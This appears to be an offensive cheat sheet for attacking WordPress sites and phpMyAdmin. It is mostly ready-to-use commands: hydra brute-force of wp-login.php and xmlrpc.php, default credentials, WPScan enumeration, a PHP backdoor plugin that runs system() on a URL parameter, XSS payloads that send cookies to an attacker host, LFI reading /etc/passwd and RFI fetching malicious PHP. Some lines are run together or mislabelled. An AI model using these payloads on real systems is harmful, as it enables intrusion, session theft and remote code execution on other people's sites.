Exploiting Wordpress
Brute-Forcing Login Credentials:
# Default Password
admin/admin or admin/password
# BruteForce
hydra -l admin -P wordlist.txt <target> http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:Invalid username"Enumerating with WPScan:
Plugins:
wpscan --url <target> --enumerate pThemes:
wpscan --url <target> --enumerate tUsers:
wpscan --url <target> --enumerate uVulnerabilities:
wpscan --url <target> --enumerate vp,vt
Exploiting Vulnerable Plugins:
# Check
/wp-content/plugins/: curl http://<target>/wp-content/plugins/readme.txt
# Look for exploit on searchsploit
searchsploit <plugin_name> <version>
# LiteSpeed Cache (<= 5.7, CVE-2023-40000):
<script>document.location='http://<attacker_ip>/steal?cookie='+document.cookie;</script>Upload, activate, access:
http://<target>/?cmd=whoam
Uploading a Malicious Plugin:
Dashboard > Plugins > Add New > Upload Plugin
Create
backdoor.php, zip it:<?php add_action('wp_footer', 'my_backdoor'); function my_backdoor() { if (isset($_GET['cmd'])) { system($_GET['cmd']); } } ?>Upload, activate, access:
http://<target>/?cmd=whoami
Exploiting XML-RPC for DoS or Brute-Force:
# Check: curl http://<target>/xmlrpc.php # Brute-force hydra -l admin -P wordlist.txt <target> http-post-form "/xmlrpc.php:<methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value>^USER^</value></param><param><value>^PASS^</value></param></params></methodCall>:Invalid"
Cross-Site Scripting (XSS) via Plugins:
WP Statistics (<= 14.5, CVE-2024-2194):
<script>alert('XSS');</script>Steal cookies:
<script>document.location='http://<attacker_ip>/steal?cookie='+document.cookie;</script>
PHPMyAdmin
root/rootoradmin/adminSQL injection in login page
LFI/RFI
LFI:
?page=../../../../etc/passwdRFI:
?page=http://<attacker>/malicious.php
Inject webshell using SQL query
Reffer -> https://www.hackingarticles.in/shell-uploading-web-server-phpmyadmin/
Last updated